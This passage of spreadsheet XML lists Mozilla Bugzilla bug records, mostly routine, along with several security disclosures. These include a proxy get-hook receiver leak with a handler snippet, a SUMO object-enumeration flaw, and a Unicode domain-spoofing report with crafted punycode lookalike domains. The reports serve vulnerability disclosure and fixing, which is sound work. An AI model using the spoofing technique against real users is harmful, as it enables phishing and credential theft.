          <t>Seen using  Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3pre) Gecko/2008010805 Minefield/3.0b3pre. Seen on Mac as well.
STR:
1. Start the latest nightly with a new profile.
Result: Observe that nothing appears in the bookmarks toolbar (no smart browsing folder and no default RSS feed).</t>
        </is>
      </c>
      <c r="X1904" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" t="n">
        <v>1105045</v>
      </c>
      <c r="B1905" t="inlineStr">
        <is>
          <t>2014-11-25 15:36:04 -0800</t>
        </is>
      </c>
      <c r="C1905" t="inlineStr">
        <is>
          <t>Receiver passed to proxy get hook is not outerized when proxy is on the window's proto chain</t>
        </is>
      </c>
      <c r="D1905" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:32 -0700</t>
        </is>
      </c>
      <c r="E1905" t="n">
        <v>1</v>
      </c>
      <c r="F1905" t="n">
        <v>1</v>
      </c>
      <c r="G1905" t="n">
        <v>3</v>
      </c>
      <c r="H1905" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1905" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1905" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1905" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1905" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1905" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1905" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1905" t="inlineStr">
        <is>
          <t>[reporter-external][post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q1905" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1905" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1905" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1905" t="n">
        <v>1</v>
      </c>
      <c r="U1905" t="n">
        <v>0</v>
      </c>
      <c r="V1905" t="n">
        <v>20</v>
      </c>
      <c r="W1905" t="inlineStr">
        <is>
          <t>Created attachment 8528652
Testcase
Credit for finding this goes to André Bargull (cced).
If you have a proxy that has a handler like this:
  {
    get: function(t,pk,r) {
    },
    has: function(t,pk) {
      return pk == 'try_to_get_global_object';
    }
  }
on the proto chain of the window and then you evaluate the bareword "try_to_get_global_object" then the "r" that's passed to the get hook is the inner window.  The attached testcase shows this clearly: r === window tests false, but calling a getter on "r" that just returns "this" (which just serves to outerize) returns something that's equal to "window".</t>
        </is>
      </c>
      <c r="X1905" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" t="n">
        <v>914248</v>
      </c>
      <c r="B1906" t="inlineStr">
        <is>
          <t>2013-09-09 09:25:29 -0700</t>
        </is>
      </c>
      <c r="C1906" t="inlineStr">
        <is>
          <t>mdn can't connect to elasticsearch-zlb.webapp.scl3.mozilla.com</t>
        </is>
      </c>
      <c r="D1906" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E1906" t="n">
        <v>1</v>
      </c>
      <c r="F1906" t="n">
        <v>1</v>
      </c>
      <c r="G1906" t="n">
        <v>6</v>
      </c>
      <c r="H1906" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1906" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1906" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K1906" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1906" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1906" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1906" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1906" t="inlineStr"/>
      <c r="Q1906" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1906" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1906" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1906" t="n">
        <v>1</v>
      </c>
      <c r="U1906" t="n">
        <v>0</v>
      </c>
      <c r="V1906" t="n">
        <v>4</v>
      </c>
      <c r="W1906" t="inlineStr">
        <is>
          <t>Started yesterday around noon?
https://errormill.mozilla.org/mdn/mdn/group/91489/</t>
        </is>
      </c>
      <c r="X1906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" t="n">
        <v>490295</v>
      </c>
      <c r="B1907" t="inlineStr">
        <is>
          <t>2009-04-27 02:39:32 -0700</t>
        </is>
      </c>
      <c r="C1907" t="inlineStr">
        <is>
          <t>Please QA and Sign the eBay Partner Repack (3.0.10)</t>
        </is>
      </c>
      <c r="D1907" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E1907" t="n">
        <v>1</v>
      </c>
      <c r="F1907" t="n">
        <v>1</v>
      </c>
      <c r="G1907" t="n">
        <v>5</v>
      </c>
      <c r="H1907" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1907" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1907" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1907" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1907" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1907" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1907" t="inlineStr"/>
      <c r="Q1907" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1907" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1907" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1907" t="n">
        <v>1</v>
      </c>
      <c r="U1907" t="n">
        <v>0</v>
      </c>
      <c r="V1907" t="n">
        <v>5</v>
      </c>
      <c r="W1907" t="inlineStr">
        <is>
          <t>Please start the QA review process on the 3.0.10 version of the eBay partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:eBay
3.0.10 installers are available from their respective locale directories at:
https://people.mozilla.com/files/partners/ebay/3.0.10/
Please note that the installers, until QA'd and digitally signed, are password protected. Distributions will be publicly available once they are QA'd and signed.</t>
        </is>
      </c>
      <c r="X1907" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" t="n">
        <v>588576</v>
      </c>
      <c r="B1908" t="inlineStr">
        <is>
          <t>2010-08-18 14:56:31 -0700</t>
        </is>
      </c>
      <c r="C1908" t="inlineStr">
        <is>
          <t>Hook to include a wiki page in another page</t>
        </is>
      </c>
      <c r="D1908" t="inlineStr">
        <is>
          <t>2011-04-07 10:22:49 -0700</t>
        </is>
      </c>
      <c r="E1908" t="n">
        <v>1</v>
      </c>
      <c r="F1908" t="n">
        <v>1</v>
      </c>
      <c r="G1908" t="n">
        <v>5</v>
      </c>
      <c r="H1908" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1908" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1908" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1908" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1908" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1908" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1908" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1908" t="inlineStr"/>
      <c r="Q1908" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1908" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1908" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T1908" t="n">
        <v>1</v>
      </c>
      <c r="U1908" t="n">
        <v>0</v>
      </c>
      <c r="V1908" t="n">
        <v>3</v>
      </c>
      <c r="W1908" t="inlineStr">
        <is>
          <t>Syntax: [[Include:Article name]]
This hook just replaces above syntax with the content of Article name</t>
        </is>
      </c>
      <c r="X1908" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" t="n">
        <v>835736</v>
      </c>
      <c r="B1909" t="inlineStr">
        <is>
          <t>2013-01-29 01:54:37 -0800</t>
        </is>
      </c>
      <c r="C1909" t="inlineStr">
        <is>
          <t>upload's up_image_async() allows enumeration of all models by primary key</t>
        </is>
      </c>
      <c r="D1909" t="inlineStr">
        <is>
          <t>2016-03-04 07:33:05 -0800</t>
        </is>
      </c>
      <c r="E1909" t="n">
        <v>1</v>
      </c>
      <c r="F1909" t="n">
        <v>1</v>
      </c>
      <c r="G1909" t="n">
        <v>5</v>
      </c>
      <c r="H1909" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1909" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1909" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1909" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1909" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1909" t="inlineStr">
        <is>
          <t>u=dev c=upload p=1 s=2013.10 [site:support.mozilla.org]</t>
        </is>
      </c>
      <c r="Q1909" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1909" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1909" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T1909" t="n">
        <v>1</v>
      </c>
      <c r="U1909" t="n">
        <v>0</v>
      </c>
      <c r="V1909" t="n">
        <v>14</v>
      </c>
      <c r="W1909" t="inlineStr">
        <is>
          <t>The view accepts a model name and a primary key as POST parameters, it will then get whatever model was requested that has the given id (or return a JSON response with "Model does not exist")
It subsequently tries to attach the POSTed image to the given object, which will hopefully raise exception for most unintended model names.
I don't know if this could be used to mess with the application and, for example, change the avatar of some other user. But it sure does allow the enumeration of all objects in the database by checking the response status ("Model does not exist" or other error).
I suggest we check against a whitelist of allowed models and do permission checks for the current user.
The affected code lines are here: https://github.com/mozilla/kitsune/blob/master/apps/upload/views.py#L24</t>
        </is>
      </c>
      <c r="X1909" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" t="n">
        <v>1360309</v>
      </c>
      <c r="B1910" t="inlineStr">
        <is>
          <t>2017-04-27 11:29:10 -0700</t>
        </is>
      </c>
      <c r="C1910" t="inlineStr">
        <is>
          <t>Security issue: Domain spoofing thanks to U+0F8C rendered as space on Mac</t>
        </is>
      </c>
      <c r="D1910" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:27 -0700</t>
        </is>
      </c>
      <c r="E1910" t="n">
        <v>1</v>
      </c>
      <c r="F1910" t="n">
        <v>1</v>
      </c>
      <c r="G1910" t="n">
        <v>2</v>
      </c>
      <c r="H1910" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1910" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1910" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K1910" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L1910" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1910" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1910" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1910" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q1910" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1910" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1910" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T1910" t="n">
        <v>1</v>
      </c>
      <c r="U1910" t="n">
        <v>0</v>
      </c>
      <c r="V1910" t="n">
        <v>28</v>
      </c>
      <c r="W1910" t="inlineStr">
        <is>
          <t>Created attachment 8862557
Domain spoofing example
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Steps to reproduce:
The character U+0F8C (TIBETAN SIGN INVERTED MCHU CAN) when used in a domain name in Firefox on Mac looks just like a space.
This can be abused to spoof a legitimate domain followed by a chain of the character, e.g. "accounts.google.com&lt;U+0F8C x 52&gt;.bntk.pl".
I have created a domain https://important-domain.google.xn--com-lumaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bntk.pl/ which is SSL-enabled and looks just like important-domain.google.com when your Firefox window is now wide enough to cover the whole address. The DNS limits makes it impossible to add arbitrary number of U+0F8C chars in the address bar. As a workaround, the attacker might add just a dot, hoping that the end-user will not notice it, for example: http://important-domain.google.xn--com-lumaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.xn--cfdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bntk.pl/.
I have attached a screenshot of a SSL-enabled domain using 53 U+0F8C characters.</t>
        </is>
      </c>
      <c r="X1910" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" t="n">
        <v>1451599</v>
      </c>
      <c r="B1911" t="inlineStr">
        <is>
          <t>2018-04-04 21:01:41 -0700</t>
        </is>
      </c>
      <c r="C1911" t="inlineStr">
        <is>
          <t>Checkbox for agreement terms at create account page should be on the left side</t>
        </is>
      </c>
      <c r="D1911" t="inlineStr">
        <is>
          <t>2018-04-23 13:29:30 -0700</t>
        </is>
      </c>
      <c r="E1911" t="n">
        <v>1</v>
      </c>
      <c r="F1911" t="n">
        <v>1</v>
      </c>
      <c r="G1911" t="n">
        <v>7</v>
      </c>
      <c r="H1911" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1911" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1911" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K1911" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L1911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1911" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1911" t="inlineStr"/>
      <c r="Q1911" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1911" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S1911" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1911" t="n">
        <v>1</v>
      </c>
      <c r="U1911" t="n">
        <v>0</v>
      </c>
      <c r="V1911" t="n">
        <v>2</v>
      </c>
      <c r="W1911" t="inlineStr">
        <is>
          <t>Created attachment 8965208
checkbox_bad_ui.jpg
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
1. Start Firefox by clicking on the desktop icon
2. Copy and paste https://bugzilla.mozilla.org/createaccount.cgi in the address bar and press Enter
Actual results:
Observe checkbox is on the right of "I have read Bugzilla Etiquette and the Mozilla Community Participation Guidelines and agree to abide by them."
Expected results:
Checkbox should be on the left of "I have read Bugzilla Etiquette and the Mozilla Community Participation Guidelines and agree to abide by them."</t>
        </is>
      </c>
      <c r="X1911" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" t="n">
        <v>844088</v>
      </c>
      <c r="B1912" t="inlineStr">
        <is>
          <t>2013-02-22 05:59:18 -0800</t>
        </is>
      </c>
      <c r="C1912" t="inlineStr">
        <is>
          <t>ASAN: Several xpcshell tests in toolkit/identity trigger use-after-free, involving KeyGenRunnable</t>
        </is>
      </c>
      <c r="D1912" t="inlineStr">
        <is>
          <t>2019-02-25 08:54:27 -0800</t>
        </is>
      </c>
      <c r="E1912" t="n">
        <v>1</v>
      </c>
      <c r="F1912" t="n">
        <v>1</v>
      </c>
      <c r="G1912" t="n">
        <v>6</v>
      </c>
      <c r="H1912" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1912" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1912" t="inlineStr">
        <is>
          <t>Identity</t>
        </is>
      </c>
      <c r="K1912" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1912" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1912" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1912" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1912" t="inlineStr">
        <is>
          <t>[asan][asan-test-failure][fixed by bug 850253][adv-main23+]</t>
        </is>
      </c>
      <c r="Q1912" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1912" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1912" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T1912" t="n">
        <v>1</v>
      </c>
      <c r="U1912" t="n">
        <v>0</v>
      </c>
      <c r="V1912" t="n">
        <v>17</v>
      </c>
      <c r="W1912" t="inlineStr">
        <is>
          <t>Created attachment 717100
ASan log
In several try runs I've already been observing that tests like
toolkit/identity/tests/unit/test_jwcrypto.js
toolkit/identity/tests/unit/test_relying_party.js
toolkit/identity/tests/unit/test_provisioning.js
cause ASan errors. I was however never able to reproduce it locally. Now I managed to reproduce a failure with the third test locally, using:
taskset -c 0 make -C toolkit/identity/tests/ xpcshell-tests
on an optimized build (mozilla-central 885cde564ff3). Might need to run it multiple times, but maybe the attached symbolized trace already helps to solve this issue.</t>
        </is>
      </c>
      <c r="X1912" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" t="n">
        <v>1164022</v>
      </c>
      <c r="B1913" t="inlineStr">
        <is>
          <t>2015-05-12 07:04:12 -0700</t>
        </is>
      </c>
      <c r="C1913" t="inlineStr">
        <is>
          <t>[user story 2B] Add registration/sign-up to AAQ</t>
        </is>
      </c>
      <c r="D1913" t="inlineStr">
        <is>
          <t>2023-05-05 02:23:36 -0700</t>
        </is>
      </c>
      <c r="E1913" t="n">
        <v>1</v>
      </c>
      <c r="F1913" t="n">
        <v>1</v>
      </c>
      <c r="G1913" t="n">
        <v>5</v>
      </c>
      <c r="H1913" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1913" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1913" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1913" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1913" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1913" t="inlineStr">
        <is>
          <t>u=user c=AAQ</t>
        </is>
      </c>
      <c r="Q1913" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1913" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1913" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1913" t="n">
        <v>1</v>
      </c>
      <c r="U1913" t="n">
        <v>0</v>
      </c>
      <c r="V1913" t="n">
        <v>6</v>
      </c>
      <c r="W1913" t="inlineStr">
        <is>
          <t>As a SUMO champion I'd like to present users with a registration step in-line with the "question asking" step, so they don't bounce before writing down their question.
UX and acceptance criteria coming.</t>
        </is>
      </c>
      <c r="X1913" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" t="n">
        <v>1645855</v>
      </c>
      <c r="B1914" t="inlineStr">
        <is>
          <t>2020-06-15 10:22:42 -0700</t>
        </is>
      </c>
      <c r="C1914" t="inlineStr">
        <is>
          <t>Intermittent error: linker command failed with exit code 1</t>
        </is>
      </c>
      <c r="D1914" t="inlineStr">
        <is>
          <t>2020-06-15 10:40:37 -0700</t>
        </is>
      </c>
      <c r="E1914" t="n">
        <v>1</v>
      </c>
      <c r="F1914" t="n">
        <v>1</v>
      </c>
      <c r="G1914" t="n">
        <v>7</v>
      </c>
      <c r="H1914" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1914" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1914" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K1914" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1914" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1914" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1914" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1914" t="inlineStr"/>
      <c r="Q1914" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R1914" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1914" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1914" t="n">
        <v>1</v>
      </c>
      <c r="U1914" t="n">
        <v>0</v>
      </c>
      <c r="V1914" t="n">
        <v>2</v>
      </c>
      <c r="W1914" t="inlineStr">
        <is>
          <t>**Filed by:** csabou [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=306384736&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/CGZzeDMeTk-cjdtCyYXa1g/runs/0/artifacts/public/logs/live_backing.log
---
[task 2020-06-15T16:34:23.015Z] 16:34:23     INFO -  TEST-PASS | check_glibc | firefox-bin
[task 2020-06-15T16:34:23.015Z] 16:34:23     INFO -  TEST-PASS | check_textrel | firefox-bin
[task 2020-06-15T16:34:23.015Z] 16:34:23     INFO -  make[4]: Leaving directory '/builds/worker/workspace/obj-build/browser/app'
[task 2020-06-15T16:34:23.088Z] 16:34:23     INFO -  make[4]: Entering directory '/builds/worker/workspace/obj-build/security/sandbox/linux'
[task 2020-06-15T16:34:23.089Z] 16:34:23     INFO -  /builds/worker/fetches/clang/bin/clang++ -std=gnu++17 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -Qunused-arguments -Qunused-arguments -Wall -Wbitfield-enum-conversion -Wempty-body -Wignored-qualifiers -Woverloaded-virtual -Wpointer-arith -Wshadow-field-in-constructor-modified -Wsign-compare -Wtype-limits -Wunreachable-code -Wunreachable-code-return -Wwrite-strings -Wno-invalid-offsetof -Wclass-varargs -Wempty-init-stmt -Wfloat-overflow-conversion -Wfloat-zero-conversion -Wloop-analysis -Wc++2a-compat -Wcomma -Wimplicit-fallthrough -Wunused-function -Wunused-variable -Werror=non-literal-null-conversion -Wstring-conversion -Wtautological-overlap-compare -Wtautological-unsigned-enum-zero-compare -Wtautological-unsigned-zero-compare -Wno-error=tautological-type-limit-compare -Wno-inline-new-delete -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=backend-plugin -Wno-error=return-std-move -Wno-error=atomic-alignment -Wformat -Wformat-security -Wno-gnu-zero-variadic-macro-arguments -Wno-unknown-warning-option -D_GLIBCXX_USE_CXX11_ABI=0 -fno-sized-deallocation -fno-aligned-new -fcrash-diagnostics-dir=/builds/worker/artifacts -fno-exceptions -fno-strict-aliasing -fno-rtti -ffunction-sections -fdata-sections -fno-exceptions -fno-math-errno -pthread -pipe -g -Xclang -load -Xclang /builds/worker/workspace/obj-build/build/clang-plugin/libclang-plugin.so -Xclang -add-plugin -Xclang moz-check -O3 -fno-omit-frame-pointer -funwind-tables -Werror -DNS_FREE_PERMANENT_DATA=1 -fprofile-generate -fPIC -shared -Wl,-z,defs -Wl,--gc-sections -Wl,-h,libmozsandbox.so -o libmozsandbox.so /builds/worker/workspace/obj-build/security/sandbox/linux/libmozsandbox_so.list   -lpthread -Wl,-z,noexecstack -Wl,-z,text -Wl,-z,relro -Wl,-z,nocopyreloc -Wl,-Bsymbolic-functions -Wl,--build-id=sha1 -fstack-protector-strong -Wl,-rpath-link,/builds/worker/workspace/obj-build/dist/bin -Wl,-rpath-link,/usr/local/lib -fprofile-generate   ../../../config/external/nspr/pr/libnspr4.so ../../../config/external/nspr/libc/libplc4.so ../../../config/external/nspr/ds/libplds4.so   -ldl  -Wl,--version-script,/builds/worker/checkouts/gecko/build/unix/stdc++compat/hide_std.ld -lrt
[task 2020-06-15T16:34:23.089Z] 16:34:23     INFO -  /builds/worker/fetches/binutils/bin/ld: Unified_cpp_sandbox_linux0.o: in function `base::ConditionVariable::Wait()':
[task 2020-06-15T16:34:23.090Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/security/sandbox/chromium/base/synchronization/condition_variable_posix.cc:70: undefined reference to `base::Location::CreateFromHere(char const*, char const*, int)'
[task 2020-06-15T16:34:23.090Z] 16:34:23     INFO -  /builds/worker/fetches/binutils/bin/ld: Unified_cpp_sandbox_linux0.o: in function `base::ConditionVariable::TimedWait(base::TimeDelta const&amp;)':
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/security/sandbox/chromium/base/synchronization/condition_variable_posix.cc:86: undefined reference to `base::Location::CreateFromHere(char const*, char const*, int)'
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/fetches/binutils/bin/ld: Unified_cpp_sandbox_linux1.o: in function `base::WaitableEvent::TimedWait(base::TimeDelta const&amp;)':
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/security/sandbox/chromium/base/synchronization/waitable_event_posix.cc:173: undefined reference to `base::Location::CreateFromHere(char const*, char const*, int)'
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/fetches/binutils/bin/ld: Unified_cpp_sandbox_linux1.o: in function `base::WaitableEvent::WaitMany(base::WaitableEvent**, unsigned long)':
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/security/sandbox/chromium/base/synchronization/waitable_event_posix.cc:253: undefined reference to `base::Location::CreateFromHere(char const*, char const*, int)'
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/fetches/binutils/bin/ld: Unified_cpp_sandbox_linux1.o: in function `base::PlatformThread::Join(base::PlatformThreadHandle)':
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/security/sandbox/chromium/base/threading/platform_thread_posix.cc:276: undefined reference to `base::Location::CreateFromHere(char const*, char const*, int)'
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  clang-9: error: linker command failed with exit code 1 (use -v to see invocation)
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  /builds/worker/checkouts/gecko/config/rules.mk:604: recipe for target 'libmozsandbox.so' failed
[task 2020-06-15T16:34:23.091Z] 16:34:23    ERROR -  make[4]: *** [libmozsandbox.so] Error 1
[task 2020-06-15T16:34:23.091Z] 16:34:23     INFO -  make[4]: Leaving directory '/builds/worker/workspace/obj-build/security/sandbox/linux'
